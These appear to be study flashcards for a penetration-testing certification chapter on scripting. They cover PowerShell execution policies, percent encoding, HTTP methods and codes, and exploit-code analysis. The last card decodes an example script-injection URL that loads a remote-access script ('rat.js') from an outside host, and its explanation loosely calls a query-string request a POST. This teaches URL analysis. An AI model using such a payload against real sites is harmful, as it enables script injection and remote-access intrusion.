Chapter 12: Scripting for Penetration Testing Flashcards

1
Q

Six Languages on Test

A
  • Bash
  • PowerShell
  • Ruby
  • Python
  • Perl
  • JavaScript
2
Q

PowerShell Restrictions

A
  • Restricted: Default ps1 execution policy that blocks all use of scripts
  • AllSigned: Requires any ps1 script to be signed by a trusted publisher
  • RemoteSigned: Allows execution of any ps1 script that you write on the local machine, but requires scripts downloaded from the internet to be signed by a trusted publisher
  • Unrestricted: Allows execution of any ps1 script but prompts you to confirm before you run one from the internet
  • Bypass: Allows execution of any ps1 script with no warning for anything
3
Q

Percent Encoding

A
  • %00: null
  • %20: Space
  • %21: !
  • %22: "
  • %23: #
  • %24: $
  • %25: %
  • %26: &
  • %27: '
  • %28: (
  • %29: )
  • %2A: *
  • %2B: +
  • %2C: ,
  • %2D: -
  • %2E: .
  • %2F: /
  • %5C: \
  • %3F: ?
  • %3C: <
  • %3E: >
4
Q

Flow Controls

A
  • Conditional Statements: Diagram on page 459
  • For Loops: Diagram on page 464
  • While Loops: Diagram on page 470
5
Q

Analyzing Exploit Code

A

Enumeration
* Seeks to identify all the instances of a resource in an environment
* System enum identifies all the systems on a network
* User/Account enum identifies all the individuals with access to the environment
* Domain enum seeks to identify all valid subdomains for a parent domain

Downloading Files
* Commonly done to update malicious code, obtain instructions, or import new tools
* Pay attention to these downloads since the location and nature of files downloaded may provide clues to the identity and motivation of the attackers

Launching Remote Access
* One primary goal for attackers
* Once they run exploit code, they want to create remote access capabilities that allow them to control the system
* Provides important clues to the nature and purpose of an attack

6
Q

Automating Pentests

A

Scanning Systems
* Testers may create code that automatically performs port scans of an environment, processes the results, and then automatically triggers next steps based on the results
* EX: If a port scan indicates that a web server accepts HTTPS on port 443, a follow-up scan might enumerate the SSL/TLS ciphers supported by the server and produce a report for review

Configuration Analysis of Target Systems
* Automated code can probe the configuration of a target system and produce a report that helps ID next steps

Modifying IP Addresses in Routine Activities
* Allows the rapid application of techniques to many different systems in an iterative fashion
* EX: Cycle through IPs in a for loop

7
Q

HTTP Method

A

A set of request methods to indicate the desired action to be performed for a given resource

A request contains a method, a resource, a version number, the header, and the body of the request

GET
* The principal HTTP method; used to retrieve a resource

POST
* Used to send data to the server for processing by the requested resource

PUT
* Creates or replaces the requested resource

DELETE
* Used to remove the requested resource

HEAD
* Retrieves the headers for a resource only and ignores the body
* Often used by pentesters to banner grab information about the server and page, like the title of the page

NOTE
* Data submitted via a URL is delimited by the ? character

8
Q

HTTP Response Codes

A
  • 200 = Successful GET or POST request
  • 201 = Successful PUT request to create a resource
  • 3xx = Redirect from the server
  • 4xx = Client request error
  • 400 = Request could not be parsed by server
  • 401 = Request did not supply auth creds
  • 403 = Request did not have sufficient permissions
  • 404 = Non-existent resource
  • 5xx = Server side error
  • 500 = General error on server side app
  • 502 = Bad gateway when server is acting as a proxy
  • 503 = Overload, service unavailability
  • 504 = Gateway timeout
9
Q

Example URL Analysis

A

hxxp://diontraining[.]com/upload.php?post=%3Cscript%3E%27http%3A%2F%2Fabc123.com%2Frat%2Ejs

hxxp://diontraining[.]com/upload.php?post=
* The website we’re going to
* The file on that website
* The action we’re going to do—POST
* Everything after the = is what we POST

%3Cscript%3E
* <script>

%2F%2Fabc123.com%2Frat%2Ejs
* 'hxxp://abc123[.]com/rat.js (defanged)

Putting It Together
* Go to diontraining dot com
* Access the file upload.php
* POST that file (upload)
* Send it to this website address
* Link to rat.js
* Trying to send a JS file to the site
* If it was vulnerable, malicious code is uploaded
